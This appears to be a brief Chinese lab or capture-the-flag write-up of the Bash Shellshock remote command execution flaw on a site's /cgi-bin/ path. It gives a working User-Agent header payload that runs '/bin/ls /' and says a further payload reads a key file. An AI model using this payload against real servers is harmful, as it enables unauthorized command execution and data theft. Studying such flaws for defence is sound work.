Bash远程命令执行漏洞存在于网站的/cgi-bin/目录下;

0x2D.Bash漏洞分析溯源

抓包后在HTTP请求中插入poc;

poc:

User-Agent: () { :;}; echo; /bin/ls /

0x2D.Bash漏洞分析溯源

再构造poc能够查看key文件;

0x2D.Bash漏洞分析溯源

 

漏洞详情:

https://www.freebuf.com/vuls/44994.html

 

相关文章:

  • 2021-08-20
  • 2021-11-03
  • 2021-08-17
  • 2021-08-27
  • 2021-12-28
  • 2021-05-07
  • 2021-08-28
  • 2021-08-28
猜你喜欢
  • 2021-12-23
  • 2022-01-19
  • 2021-06-16
  • 2021-04-23
  • 2021-08-14
  • 2021-08-09
相关资源
相似解决方案